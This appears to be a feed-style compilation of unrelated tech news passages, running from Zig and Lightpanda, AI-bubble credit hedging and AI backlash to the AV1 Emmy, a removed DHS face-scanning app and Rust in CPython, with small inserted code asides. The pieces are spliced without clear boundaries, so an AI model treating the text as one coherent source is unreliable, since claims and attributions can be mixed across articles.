This eliminates manual binding code and makes adding new types simple by using the same language at compile time and runtime.
C Interop That Just Works
Zig’s C interop is a first-class feature: you can directly import C header files and call C functions without wrapper libraries.
For example, we use cURL as our HTTP library. We can just import libcurl C headers in Zig and use the C functions directly.
It feels as simple as using C, except you are programming in Zig.
And with the build system it’s also very simple to add the C sources so that everything (your Zig code and the C libraries) builds together.
This simplicity of importing C mitigates the fact that the Zig ecosystem is still small, as you can use all the existing C libraries.
The Build System Advantage
Zig includes its own build system written in Zig itself. This might sound unremarkable, but compared to CMake, it’s refreshingly straightforward. Adding dependencies, configuring compilation flags, and managing cross-compilation all happen in one place with clear semantics. Runtime, comptime, build system: everything is in Zig, which makes things easier.
Cross-compilation in particular is usually a difficult topic, but it’s very easy with Zig. Some projects like
Uber
use Zig mainly as a build system and toolchain.
Compile times matter
Zig compiles fast. Our full rebuild takes under a minute. Not as fast as Go or an interpreted language, but fast enough for a feedback loop that makes development feel responsive. In that regard, Zig is considerably faster than Rust or C++.
This is a strong focus of the Zig team. They are also a small team and they need fast compilation for the development of the language, as Zig is written in Zig (self-hosted). For that purpose, they are developing native compiler backends (i.e. not using LLVM), which is very ambitious and yet successful: it’s already the default backend for x86 in debug mode, with a significant improvement in build times (
3.5x faster for the Zig project itself
). And
incremental compilation
is on its way.
What We’ve Learned
After months of building Lightpanda in Zig, here’s what stands out.
The learning curve is manageable.
Zig’s simplicity means you can understand the entire language in a few weeks. Compared to Rust or C++, this makes a real difference.
The allocator model pays off.
Being able to create arena allocators per page load, per request, or per task gives us fine-grained memory control without tracking individual allocations.
The community
is small but helpful. Zig is still growing. The Discord community and
ziggit.dev
are active, and the language is simple enough that you can often figure things out by reading the standard library source.
Conclusion
Lightpanda wouldn’t exist without the work of the Zig Foundation and the community behind it. Zig has made it possible to build something as complex as a browser with a small team and a clear mental model, without sacrificing performance.
If you’re curious about Zig’s design philosophy or want to see how its compiler and allocator model work, the
official documentation
is the best place to start.
Zig is still pre-1.0, which means breaking changes can happen between versions. That said, we’ve found it stable enough for our production use, especially since the ecosystem has largely standardized on tracking the latest tagged releases rather than main. The language itself is well-designed, and most changes between versions are improvements that are worth adapting to. Just be prepared to update code when upgrading Zig versions.
What’s the hardest part about learning Zig?
The allocator model takes adjustment if you’re coming from garbage-collected languages. You need to think about where memory comes from and when it gets freed. But compared to Rust’s borrow checker or C++’s memory management, it’s relatively straightforward once you understand the patterns.
Can Zig really replace C++ for browser development?
For building a focused browser like Lightpanda, yes. For replacing Chromium or Firefox, that’s unlikely: those projects have millions of lines of C++ and decades of optimization. We’re more likely to see Rust complementing C++ in those projects over time, for example how Firefox is leveraging
Servo
. But for new projects where you control the codebase, Zig is absolutely viable.
Where can I learn more about Zig?
Start with the
official Zig documentation
. The
Zig Learn
site provides practical tutorials. And join the community on
Discord
or
ziggit.dev
where developers actively help newcomers. The language is simple enough that reading standard library source code is also a viable learning approach.
Francis Bouvier
Cofounder & CEO
Francis previously cofounded BlueBoard, an ecommerce analytics platform acquired by ChannelAdvisor in 2020. While running large automation systems he saw how limited existing browsers were for this kind of work. Lightpanda grew from his wish to give developers a faster and more reliable way to automate the web.
Wall Street races to protect itself from AI bubble
Banks are lending unprecedented sums to technology giants building artificial intelligence infrastructure while quietly using derivatives to shield themselves from potential losses.
Wall Street finds itself in an unusual position as it prepares to lend staggering amounts to artificial intelligence companies. Even as banks facilitate what may become the largest borrowing binge in technology history, they are simultaneously deploying an arsenal of financial tools to protect themselves from the very bubble their money might be inflating.
The anxiety permeating credit markets tells the story. The cost of insuring Oracle debt against default through derivatives has climbed to levels not seen since the Global Financial Crisis. Morgan Stanley has explored using specialized insurance mechanisms to reduce exposure to its tech borrowers. Across trading desks, lenders are quietly hedging positions even as they publicly champion the transformative potential of artificial intelligence.
Unprecedented Wall Street lending to technology giants
Mega offerings from Oracle,
Meta
Platforms and Alphabet have pushed global bond issuance past $6.46 trillion in 2025. These hyperscalers, alongside electric utilities and related firms, are expected to spend at least $5 trillion racing to build data centers and infrastructure for technology promising to revolutionize the global economy.
The scale is so immense that issuers must tap virtually every major debt market, according to JPMorgan Chase analysis. These technology investments could take years to generate returns, assuming they deliver profits at all. The frenzied pace has left some lenders dangerously overexposed, prompting them to use credit derivatives, sophisticated bonds and newer financial products to shift underwriting risk to other investors.
Technology that may not translate to profits
Steven Grey, chief investment officer at Grey Value Management, emphasized that impressive technology does not automatically guarantee profitability. Those risks became tangible last week when a major outage halted trading at CME Group and served as a stark reminder that data center customers can abandon providers after repeated breakdowns. Following that incident, Goldman Sachs paused a planned $1.3 billion mortgage bond sale for CyrusOne, a data center operator.
Banks have turned aggressively to credit derivatives markets to reduce exposure. Trading of Oracle credit default swaps exploded to roughly $8 billion over the nine weeks ended November 28, according to analysis of trade repository data by Barclays credit strategist Jigar Patel. That compares to just $350 million during the same period last year.
Banks are providing the bulk of massive construction loans for data centers where Oracle serves as the intended tenant, likely driving much of this hedging activity, according to recent Morgan Stanley research. These include a $38 billion loan package and an $18 billion loan to build multiple new data center facilities in Texas, Wisconsin and New Mexico.
Hedging costs climb across the sector
Prices for protection have risen sharply across the board. A five year credit default swap agreement to protect $10 million of Microsoft debt from default would cost approximately $34,000 annually, or 34 basis points, as of Thursday. In mid October, that same protection cost closer to $20,000 yearly.
Andrew Weinberg, a portfolio manager at Saba Capital Management, noted that the spread on Microsoft default swaps appears remarkably wide for a company rated AAA. The hedge fund has been selling protection on the tech giant. By comparison, protection on Johnson & Johnson, the only other American company with a AAA rating, cost about 19 basis points annually on Thursday.
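The quoted figures are straightforward basis-point arithmetic on the notional being protected:
// Annual cost of protecting $10 million of debt at a given CDS spread.
const notional = 10_000_000;
const microsoftSpreadBps = 34; // per the article
const jnjSpreadBps = 19;

console.log(notional * (microsoftSpreadBps / 10_000)); // 34000: ~$34,000 per year
console.log(notional * (jnjSpreadBps / 10_000));       // 19000: ~$19,000 per year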
Weinberg suggested that selling protection on
Microsoft
at levels more than 50% wider than fellow AAA rated Johnson & Johnson represents a remarkable opportunity. Microsoft, which has not issued debt this year, declined to comment. Similar opportunities exist with Oracle, Meta and Alphabet, according to Weinberg. Despite their large debt raises, their credit default swaps trade at high spreads relative to actual default risk, making selling protection sensible. Even if these companies face downgrades, the positions should perform well because they already incorporate substantial potential bad news.
Sophisticated tools to shift Wall Street risk
Morgan Stanley, a key player in financing the artificial intelligence race, has considered offloading some data center exposure through a transaction known as a significant risk transfer. These deals can provide banks with default protection for between 5% and 15% of a designated loan portfolio. Such transfers often involve selling bonds called credit linked notes, which can have credit derivatives tied to companies or loan portfolios embedded within them. If borrowers default, the bank receives a payout covering its loss.
Morgan Stanley held preliminary talks with potential investors about a significant risk transfer tied to a portfolio of loans to businesses involved in AI infrastructure, Bloomberg reported Wednesday. Mark Clegg, a senior fixed income trader at Allspring Global Investments, observed that banks remain fully aware of recent market concerns about possible overinvestment and overvaluation. He suggested it should surprise no one that they might explore hedging or risk transfer mechanisms.
Private capital firms including Ares Management have been positioning themselves to absorb some bank exposure through significant risk transfers tied to data centers. The massive scale of recent debt offerings adds urgency to these efforts. Not long ago, a $10 billion deal in the American high grade market qualified as big. Now, with multi trillion dollar market capitalization companies and funding needs in the hundreds of billions, Teddy Hodgson, global co head of investment grade debt capital markets at Morgan Stanley, suggested that $10 billion represents merely a drop in the bucket. He noted that Morgan Stanley raised $30 billion for Meta in a drive by financing executed in a single day, an event not historically commonplace. Investors will need to adjust to bigger deals from
hyperscalers
given how much these companies have grown and how expensive capturing this opportunity will prove.
This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss PC woes, voice deepfakes, and mutual aid.
JOSEPH:
Today I’m speaking at the Digital Vulnerabilities in the Age of AI Summit (DIVAS) (good name) on a panel about the financial risks of AI. The way I see it, that applies to the scams that are being powered by AI.
As soon as a new technology is launched, I typically think of ways it might be abused. Sometimes I cover this, sometimes not, but the thought always crosses my mind. One example that did lead to coverage was
back at Motherboard in 2023
with an article called How I Broke Into a Bank Account With an AI-Generated Voice.
At the time, ElevenLabs had just launched. This company focuses on audio and AI and cloning voices. Basically you upload audio (originally that could be of anyone before ElevenLabs introduced some guardrails) and the company then lets you ‘say’ anything as that voice. I spoke to voice actors at the time who
were obviously very concerned.
bulk email delivery problems to outlook/hotmail/microsoft
May First Status Updates
status.mayfirst.org
2025-12-05 17:42:13
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Servers Affected/Servidores afectados: Mail relay servers
Period Affected/Horas afectadas: 2025-12-01 -
Date/Fecha: 2025-12-05
We are currently experiencing a higher than normal number of bounces when
sending bulk email to Microsoft email servers (including outlook.com, hotmail.com and
others).
This does not affect individual email.
We are working on it.
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEH5wwyzz8XamYf6A1oBTAWmB7dTUFAmkzX8UACgkQoBTAWmB7
dTXDFhAAn++09egH7+yChrO5FQNjN2BcMP9pdHv4vsfCM+HOEGga/soc3OY3ZDdb
jULRZKh5tV/rnWgsTIce2+JWoO3yjjnSGrqEY/qODP+2+JQeawbjgf1DlTf/LXC9
S0zDJS8YAgsvpZoMhD0eRJ22KG3MAtc2m7NPAzEScfUSv7t/ntJKNjCJ8WROYtee
Ox5MWXeApMe1C4LLfEpcOL21O8zJcbJaf/MyMaZBUt+8GefB6kbT64r0RDQgK0ec
6SuLnnjnrgas7pm9tW4ybWSbh68IupZij7lBmBXtosjh8cJL6m3RXR6akL2BumSe
1wLCjuW8PhU0E41lT3KmvQ7PP6ikxKbZ95G7Qf211YLTb+Vn+dskiTH9gAzlScZk
03zVHb2FtmDU37AohZ3coMOv8qsg7zJw7y8faiXAE6UP3fX9H9g0S7KpsUyq93q1
3sSDvp1Tfv2DrOI/63QTLzn68oPb44rzHwqPThqEoXBLfZ1q3A5gLU+cGcvEjq1A
Wkw3/n2mwZhfcy0YQjFGy/YhWVszxSJCscakKkCm4TbbYYgB+CXIu6k5r2o02yE/
Mu6J2br0rvR+7ahK8c8mi1jLga1pH9VvPJQYaAZWf+MZfegRvBRF6e24F3Tj7ccs
wgNfOVc1dmBMsx9EQ3g6TrGgu6trw58DMFYR+SzKbDTNjmBUwXY=
=pSac
-----END PGP SIGNATURE-----
We shape our environments, and thereafter they shape us.
Great technology does more than solve problems. It weaves itself into the world we inhabit. At its best, it can expand our capacity, our connectedness, our sense of what's possible. Technology can bring out the best in us.
Our current technological landscape, however, does the opposite. Feeds engineered to hijack attention and keep us scrolling, leaving a trail of anxiety and atomization in their wake. Digital platforms that increasingly mediate our access to transportation, work, food, dating, commerce, entertainment—while routinely draining the depth and warmth from everything they touch. For all its grandiose promises, modern tech often leaves us feeling alienated, ever more distant from who we want to be.
The people who build these products aren't bad or evil. Most of us got into tech with an earnest desire to leave the world better than we found it. But the incentives and cultural norms of the tech industry have coalesced around the logic of hyper-scale. It's become monolithic, magnetic, all-encompassing—an environment that shapes all who step foot there. While the business results are undeniable, so too are the downstream effects on humanity.
With the emergence of artificial intelligence, we stand at a crossroads. This technology holds genuine promise. It could just as easily pour gasoline on existing problems. If we continue to sleepwalk down the path of hyper-scale and centralization, future generations are sure to inherit a world far more dystopian than our own.
But there is another path opening before us.
Christopher Alexander spent his career exploring why some built environments deaden us, while others leave us feeling more human, more at home in the world. His work centered around the "quality without a name," this intuitive knowing that a place or an architectural element is in tune with life. By learning to recognize this quality, he argued, and constructing a building in dialogue with it, we could reliably create environments that enliven us.
We call this quality
resonance
. It's the experience of encountering something that speaks to our deeper values. It's a spark of recognition, a sense that we're being invited to lean in, to participate. Unlike the digital junk food of the day, the more we engage with what resonates, the more we're left feeling nourished, grateful, alive. As individuals, following the breadcrumbs of resonance helps us build meaningful lives. As communities, companies, and societies, cultivating shared resonance helps us break away from perverse incentives, and play positive-sum infinite games together.
For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.
This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that
adaptively shapes itself
in service of our individual and collective aspirations. We can build resonant environments that bring out the best in every human who inhabits them.
And so, we find ourselves at this crossroads. Regardless of which path we choose, the future of computing will be hyper-personalized. The question is whether that personalization will be in service of keeping us passively glued to screens—wading around in the shallows, stripped of agency—or whether it will enable us to direct more attention to what matters.
In order to build the resonant technological future we want for ourselves, we will have to resist the seductive logic of hyper-scale, and challenge the business and cultural assumptions that hold it in place. We will have to make deliberate decisions that stand in the face of accepted best practices—rethinking the system architectures, design patterns, and business models that have undergirded the tech industry for decades.
We suggest these five principles as a starting place:
Private:
In the era of AI, whoever controls the context holds the power. While data often involves multiple stakeholders, people must serve as primary stewards of their own context, determining how it's used.
Dedicated:
Software should work exclusively for you, ensuring contextual integrity where data use aligns with your expectations. You must be able to trust there are no hidden agendas or conflicting interests.
Plural:
No single entity should control the digital spaces we inhabit. Healthy ecosystems require distributed power, interoperability, and meaningful choice for participants.
Adaptable:
Software should be open-ended, able to meet the specific, context-dependent needs of each person who uses it.
Prosocial:
Technology should enable connection and coordination, helping us become better neighbors, collaborators, and stewards of shared spaces, both online and off.
We, the signatories of this manifesto, are committed to building, funding, and championing products and companies that embed these principles at their core. For us, this isn't a theoretical treatise. We're already building tooling and infrastructure that will enable resonant products and ecosystems.
But we cannot do it alone. None of us holds all the answers, and this movement cannot succeed in isolation. That's why, alongside this manifesto, we're sharing an evolving list of principles and theses. These are specific assertions about the implementation details and tradeoffs required to make resonant computing a reality. Some of these stem from our experiences, while others will be crowdsourced from practitioners across the industry. This conversation is only just beginning.
If this vision resonates, we invite you to join us. Not just as a signatory, but as a contributor. Add your expertise, your critiques, your own theses. By harnessing the collective intelligence of people who earnestly care, we can chart a path towards technology that enables individual growth and collective flourishing.
Substantive changes that have been made to this manifesto:
11/18/25
- Changed several instances of the word "user" to "people" or other humanistic alternatives. The word user carries heavy connotations of addiction.
10/28/25
- Updated the first principle (private) to include more nuanced language around the ownership of data. People must be the primary stewards of their context, but every system has multiple stakeholders.
10/28/25
- Updated the second principle (dedicated) to include the "contextual integrity" privacy model.
10/27/25
- Added header artwork and poetic introduction.
The AI Backlash Is Here: Why Public Patience with Tech Giants Is Running Out
On OpenAI’s new social app, Sora 2, a
popular video
shows a disturbingly lifelike
Sam Altman
sprinting out of a Target store with stolen computer chips, begging police not to take his “precious technology.” The clip is absurdist, a parody of the company’s own CEO, but it also speaks to a larger conversation playing out in dinner conversations, group chats and public spaces around the country: What, exactly, is this technology for?
From ads scrawled with graffiti to online comment sections filled with mockery, the public’s patience with AI-generated media is starting to wear thin. Whether it's YouTube comments deriding synthetic ad campaigns or complaints scribbled in Sharpie across New York City subway posters for AI startups, the public's discontent with the AI boom is growing louder.
What began in 2022 as broad optimism about the power of generative AI to make peoples' lives easier has instead shifted toward a sense of deep cynicism that the technology being heralded as a game changer is, in fact, only changing the game for the richest technologists in Silicon Valley who are benefiting from what appears to be an almost endless supply of money to build their various AI projects — many of which don't appear to solve any actual problems. Three years ago, as OpenAI's ChatGPT was making its splashy debut,
a Pew Research Center survey
found that nearly one in five Americans saw AI as a benefit rather than a threat. But by 2025, 43 percent of U.S. adults now believe AI is
more likely to harm them
than help them in the future, according to Pew.
Slop as a Service
As AI spreads, public skepticism is turning into open hostility toward its products and ads. Campaigns made with generative AI are mocked online and vandalized in public. Friend, a startup that spent $1 million on a sprawling campaign in the New York City subway with more than 11,000 advertisements on subway cars, 1,000 platform posters, and 130 urban panels, has been hit especially hard. Most of its ads were defaced with graffiti calling the product “surveillance capitalism” and urging people to “get real friends.”
"AI doesn't care if you live or die," reads one tag on a Friend ad in Brooklyn.
Other brands like Skechers are seeing similar backlash for an AI-generated campaign showing a distorted woman in sneakers, dismissed as lazy and unprofessional. Many of the Skechers subway posters were quickly defaced — some tagged with “slop,” the memeified shorthand for AI’s cheap, joyless flood of content, now embodied by the Altman deepfakes flooding Sora.
“The idea of authenticity has long been at the center of the social media promise, for audiences and content creators alike. But a lot of AI-generated content is not following that logic,” said Natalia Stanusch, a researcher at AI Forensics, a nonprofit that investigates the impact of artificial intelligence on digital ecosystems.
“With this flood of content made using generative AI, there is a threat of social media becoming less social and users are noticing this trend,” she told
Newsweek
.
'Wildly Oversold'
In an era where the digital and physical worlds are becoming nearly indistinguishable, one thing is increasingly clear: the skepticism toward generative
artificial intelligence
is rising on both sides of the political divide. What once held the promise of innovation in the arts—an AI that could generate art, compose music or write coherent, even beautiful, prose—has begun to feel more like saturation.
The friction isn’t just about quality—it’s about what the ubiquity of these tools signals. In entertainment, backlash has mounted as high-profile artists find themselves cloned without consent. After an AI-generated song mimicking his voice went viral on TikTok, rapper Bad Bunny lashed out on WhatsApp, telling his 19 million followers that if they enjoyed the track, “you don’t deserve to be my friends.” Similar complaints came from Drake and The Weeknd, whose own AI replicas were pulled from streaming platforms after public outcry.
“The public is finally starting to catch on,” said Gary Marcus, a professor emeritus at NYU and one of the field’s most vocal critics. “Generative AI itself may be a fad and certainly has been wildly oversold.”
That saturation, according to Marcus and others, has less to do with AI’s breakthroughs and more to do with the way companies have stripped out human labor under the guise of innovation. It's a shift that has turned into backlash—one fueled not only by developers and ethicists but by cultural figures, creators and the general public.
Alex Hanna, director of research at the Distributed AI Research Institute (DAIR) and co-author of
The A.I. Con
:
How to Fight Big Tech’s Hype and Create the Future We Want
—a critique of large language models (LLMs), the technology behind AI systems like ChatGPT and Sora—told
Newsweek
that public opinion is increasingly aligning with his criticism.
“We’re seeing this narrative that AI is this inevitable future and it's being used to shut down questions about whether people actually want these tools or benefit from them,” Hanna said. “It becomes an excuse to displace workers, to automate without accountability, and with serious questions about its impact on the environment.”
“Companies want to make it look like AI is magic,” Hanna added. “But behind that magic is a labor force, data that’s been extracted without consent and an entire system built on exploitation.”
One telling example:
Meta
’s recent launch of Vibes, a TikTok-style video app featuring only AI-generated content, was met with widespread mockery. “No one asked for this,” one viral post read. Stanusch, of AI Forensics, agreed: “For the near future, we don’t expect this adoption to slow down but rather increase,” she said.
Even as capital flows into AI infrastructure buildouts, the cultural effect of so much "slop" is creating its own language of resistance.
The term “clanker”—borrowed from Star Wars and repurposed by Gen Z—has exploded in popularity
on TikTok as a meme-slur for robots and AI systems replacing human jobs. The term, while satirical, reflects deeper anxieties about labor displacement, particularly among younger workers entering an economy being transformed by AI.
Still, some see a long-term upside. “The robots are coming, and they’re coming for everyone’s jobs," said Adam Dorr, director of research at RethinkX, in an interview with
Newsweek
. “But in the longer term, AI could take over the dangerous, miserable jobs we’ve never wanted to do.”
Dorr, like others, urges caution—not rejection. “The challenge is: how do we make this transformation safely?” he said. “People are right to be scared. We’re already on the train—and the destination may be great but the journey will be chaotic.”
The Bubble Threat
From mental health chatbots and short-form video apps to corporate ad campaigns and
toilet cameras
that can analyze feces, AI is everywhere, and billions of dollars are still pouring in.
But saturation breeds doubt: what might look like cutting-edge innovation to investors is starting to look like a bubble to everyone else.
In just the first half of 2025, global investment in AI infrastructure topped $320 billion, with $225 billion coming from U.S. hyperscalers and sovereign-backed funds, according to IDC. Microsoft alone committed over $50 billion to data center expansion this year. Meta, Amazon, OpenAI and others are backing the $500 billion Stargate AI initiative — championed by the Trump administration.
Since returning to office,
Donald Trump
has made AI central to his economic agenda, fast-tracking permitting for AI infrastructure and declaring in a recent speech: “We will win the AI race just like we did the space race.”
But many experts are unconvinced the numbers add up. “AI spending outpacing current real economic returns is not a problem—that’s what many innovative technologies call for,” Andrew Odlyzko, professor emeritus at the University of Minnesota, told
Newsweek
. “The problem is that current (and especially projected) AI spending appears to be outpacing plausible future real economic returns.”
Odlyzko warned that much of the sector is propped up by “circular investment patterns,” in which AI companies fund one another without enough real customer demand. In one such example, Nvidia recently said it would invest $100 billion in OpenAI to help it build massive data centers, essentially backstopping its own customer. “If there was a big rush of regular non-AI companies paying a lot for AI services, that would be different," Odlyzko said. "But there is no sign of it.”
Other experts like British technology entrepreneur Azeem Azhar have compared the current capex boom to past busts. “The trillions pouring into servers and power lines may be essential,” he wrote on his Substack, “but history suggests they are not where enduring profits accumulate.”
And while lawsuits over AI training data have begun piling up—including one filed by
The New York Times
against OpenAI—others center on how generative tools imitate distinct styles. A viral 2025 trend saw
ChatGPT
produce Studio Ghibli-style images so convincingly that it appeared the beloved Japanese animation studio had endorsed the platform. They had not.
Meanwhile, AI remains deeply unprofitable at scale. Last month, the consulting firm Bain
predicted
the AI industry would need to be making $2 trillion in combined annual revenues by 2030 to meet expected data center demand — a shortfall of roughly $800 billion.
“There is a lack of deep value,” the tech columnist and AI critic Ed Zitron told
Newsweek
. “The model is unsustainable.” And yet, with billions of dollars and the weight of national policy behind it, even skeptics agree: if and when the AI bubble bursts, its impact will ripple far beyond Silicon Valley.
The AV1 specification was honored with a Technology & Engineering Emmy Award on Dec. 4, 2025.
The web needed a new video codec
Through the mid-2010s, video codecs were an
invisible tax on the web
, built on a closed licensing system with expensive, unpredictable fees. Most videos online relied on the H.264 codec, which open-source projects like Firefox could only support without paying MPEG LA license fees thanks to Cisco’s
open-source OpenH264 module
.
Especially as demand for video grew, the web needed a next-generation codec to make high-quality streaming faster and more reliable. H.265 promised efficiency gains, but there was no guarantee of another OpenH264-style arrangement. The risk was another fragmented ecosystem where browsers like Firefox couldn’t play large portions of the web’s video.
Enter AV1
To solve this, Mozilla joined other technical leaders to form the
Alliance for Open Media
(AOM) in 2015 and started ambitious work on a next-generation codec built from Google’s VP9, Mozilla’s Daala, and Cisco’s Thor.
The result was AV1, released in 2018, which delivered top-tier compression as an open standard under a royalty-free patent policy. It’s now widely deployed across the streaming ecosystem, including hardware decoders and optimized software decoders, which allow open-source browsers like Firefox to provide state-of-the-art video compression to all users across the web.
AV1 is also the foundation for the image format
AVIF
, which is
deployed
across browsers and provides excellent compression for still and animated images (AVIF is based on a video codec, after all).
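As a small aside (not from the article): writing AVIF yourself is straightforward in Python if your Pillow build includes AVIF support; older setups can install the pillow-avif-plugin package instead. A hedged sketch, with illustrative file names:
# Sketch: convert a JPEG to AVIF with Pillow. Assumes a Pillow build with AVIF
# support (recent releases can include it via libavif); otherwise install
# pillow-avif-plugin and add "import pillow_avif" before saving.
from PIL import Image

with Image.open("photo.jpg") as img:
    img.save("photo.avif", quality=60)   # quality value is just an example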
The Emmy award reflects the value of open standards, open-source software, and the sustained work by AOM participants and the broader community fighting for an open web.
Looking ahead to AV2
AV1 fixed a structural problem in the ecosystem at the time, but the work isn’t finished. Video demand keeps rising, and the next generation of open codecs must remain competitive.
AOMedia is working on the upcoming release of
AV2
. It will
feature
meaningfully better compression than AV1, much higher efficiency for screen/graphical content, alpha channel support, and more.
As AV2 arrives, our goal remains unchanged: make video on the web open, efficient, and accessible to everyone.
DHS’s Immigrant-Hunting App Removed from Google Play Store
404 Media
www.404media.co
2025-12-05 17:05:47
The app, called Mobile Identify, was launched in November, and lets local cops use facial recognition to hunt immigrants on behalf of ICE. It is unclear if the removal is temporary or not....
A Customs and Border Protection (CBP) app that lets local cops use facial recognition to hunt immigrants on behalf of the federal government has been removed from the Google Play Store, 404 Media has learned.
It is unclear if the removal is temporary or not, what the exact reason is for the removal, or if Google or CBP removed the app. Neither Google nor CBP immediately responded to a request for comment. Its removal comes after
404 Media documented multiple instances
of CBP and ICE officials using their own facial recognition app to identify people and verify their immigration status, including people who said they were U.S. citizens.
The removal also comes after “hundreds” of Google employees took issue with the app, according to a source with knowledge of the situation.
“Google's a very big place, and most people at the company haven't heard anything about this, yet hundreds signaled their displeasure with the app approval, either directly in the internal report about the app, or in memes about it,” the source said. 404 Media granted multiple sources in this story anonymity to protect them from retaliation.
💡
Do you know anything else about this removal or app? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.
“We're sorry, the requested URL was not found on this server,” the app’s Play Store page says at the time of writing.
CBP launched the app, called Mobile Identify, in November. It lets a police officer point their smartphone camera at a person, perform a face scan, and the app will tell the agency to contact ICE about the person or not. The app is designed “to identify and process individuals who may be in the country unlawfully,” according to the app’s Play Store page before it was removed.
As
404 Media reported
at the time of the app’s launch, the Play Store page itself makes no mention of facial recognition. But 404 Media downloaded a copy of the app, decompiled its code, and found clear references to scanning faces, such as a package called “facescanner.”
A source with knowledge of the app previously told 404 Media the app doesn’t return names after a face search. Instead it tells users to contact ICE and provides a reference number, or to not detain the person depending on the result.
The app is specifically for local and state agencies that are part of the 287(g) program, in which ICE delegates certain immigration-related powers to local and state agencies. Members of the 287(g) Task Force Model (TFM) are allowed to enforce immigration authorities during their ordinary police duties, and “essentially turns police officers into ICE agents,” according to
the New York Civil Liberties Union
.
Google
previously told 404 Media
in a statement “This app is only usable with an official government login and does not publicly broadcast specific user data or location. Play has robust policies and when we find a violation, we take action.” Critics saw a disconnect between Google hosting a CBP app for hunting immigrants, while at the same time removing apps that let local communities report sightings of ICE officials. Google
previously described ICE officials
as a vulnerable group in need of protection.
Mobile Identify is essentially a watered-down version of Mobile Fortify, a more powerful facial recognition app
CBP and ICE are using in the field
. That app, based on leaked emails and other material obtained by 404 Media, uses CBP systems usually reserved for identifying travellers entering the U.S., and turns that technology inwards. It queries a
database of more than 200 million images
when an ICE official scans a subject’s face, according to the material. It then returns a subject’s name, date of birth, “alien number,” and whether they’ve been given an order of deportation. That app is not publicly available, and instead can only be downloaded onto DHS-issued work devices.
An internal DHS document
404 Media obtained
said ICE does not let people decline to be scanned by the app.
Before it was removed, the app had been downloaded more than a hundred times, according to 404 Media’s earlier review of the Play Store page.
About the author
Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.
Emma Smith and Kirill Podoprigora, two of Python's core developers, have
opened a
discussion
about including Rust code in CPython, the reference implementation of
the Python programming language. Initially, Rust would only be used for optional
extension modules, but they would like to see Rust become a required dependency
over time. The initial plan was to make Rust required by 2028, but Smith and
Podoprigora indefinitely postponed that goal in response to concerns raised in the discussion.
The proposal
The timeline given in their pre-PEP
called for Python 3.15 (expected in October 2026) to add a warning to Python's
configure script if Rust is not available when Python is built. Any uses of
Rust would be strictly optional at that point, so the build wouldn't fail if it is
missing. At this stage, Rust would be used in the implementation of the standard
library, in order to implement native versions of Python modules that are
important to the performance of Python applications, such as base64. Example
code to accomplish this was included in the proposal.
In 3.16, the configure script would fail if Rust is missing unless
users explicitly provide the "
--with-rust=no
" flag. In 3.17 (expected
in 2028), Python could begin strictly requiring Rust at build time — although
it would not be required at run time, for users who get their Python
installation in binary form.
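The example code from the pre-PEP isn't reproduced here, but the "optional" part maps onto a pattern the standard library already uses for its C accelerator modules (heapq falling back to pure Python when _heapq is unavailable, for instance). A hypothetical sketch of how a Rust-backed base64 accelerator could slot into that convention; the module name _base64_rust is invented for illustration:
# Pure-Python (binascii-backed) implementation, always available...
import binascii

def b64encode(s: bytes) -> bytes:
    """Fallback implementation, always available."""
    return binascii.b2a_base64(s, newline=False)

# ...and an optional native accelerator overrides it when present.
try:
    from _base64_rust import b64encode   # hypothetical Rust module, built only if Rust is available
except ImportError:                      # e.g. CPython configured with --with-rust=no
    pass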
Besides Rust's appeal as a solution to memory-safety problems, Smith cited the
increasing number of third-party Python extensions written in Rust as a reason
to bring the proposal forward. Perhaps, if Rust code could be
included directly in the CPython repository, the project would attract more
contributors interested in bringing their extensions into the standard library,
she said. The example in the pre-PEP was the base64 module, but she expressed
hope that many areas of the standard library could see improvement.
She also highlighted the
Rust for Linux
project as an example of this kind of
integration going well.
Cornelius Krupp was
apprehensive
; he thought that the Rust-for-Linux project was more of a
cautionary tale, given the public disagreements between maintainers. Those
disagreements have settled down over time, and the kernel community is currently
integrating Rust with reasonable tranquility, but the Rust for Linux project
still reminds many people of how intense disagreements over programming
languages can get in an established software project. Jacopo
Abramo
had the same worry
, but thought that the Python community might weather that kind of
disagreement better than the kernel community has. Smith
agreed
with Abramo, saying that she expected the experience to be "
altogether
different
" for Python.
Steve Dower had a
different reason
to oppose the proposal: he wasn't against the Rust part,
but he was against adding additional optional modules to Python's core code. In
his view, optional extensions should really live in a separate repository. Da
Woods
called out
that the proposal wouldn't bring any new features or
capabilities to Python. Smith replied (in the same message linked above) that
the goal was to eventually introduce Rust into the core of Python, in a
controlled way. So, the proposal wasn't only about enabling extension modules.
That
didn't satisfy
Dower, however. He said that his experience with Rust,
mixed-language code, and teams forced him to disapprove of the entire proposal.
Several
other community members
agreed with his disapproval for reasons of their
own.
Chris Angelico
expressed concern
that Rust might be more susceptible to a
"trusting trust"
attack
(where a compiler is invisibly subverted to introduce targeted
backdoors) than C, since right now Rust only has one usable compiler.
Sergey Davidoff
linked to
the
mrustc
project, which can be used to show that the Rust compiler (rustc) is free of such attacks by
comparing the artifacts produced from rustc and mrustc. Dower
agreed
that Rust didn't pose any more security risk than C, but also wasn't sure how it
would provide any security benefits, given that CPython is full of low-level C
code that any Rust code will need to interoperate with.
Aria Desires
pointed
to
the
recent Android Security post
about the adoption of Rust as
evidence that mixed code
bases adopting Rust do end up with fewer
security vulnerabilities.
Not everyone was against the proposal, however.
Alex
Gaynor
and
James Webber
both spoke up in favor. Guido van Rossum
also approved
, calling the proposal a great development and saying that he
trusted Smith and others to guide the discussion.
Stephan Sokolow
pointed out
that many people were treating the discussion as being about
"
Rust vs. C
", but that in reality it might be "
Rust vs. wear out and stop
contributing
". Paul Moore
thought
that was an insightful point, and that the project should be
willing to put in some work now in order to make contributing to the
project easier in the future.
Nathan Goldbaum is a maintainer of the
PyO3
project
, which provides Rust bindings to the Python interpreter to support
embedding Python in Rust applications and writing Python extensions in Rust. He
said
that having official Rust bindings would significantly reduce the amount of work
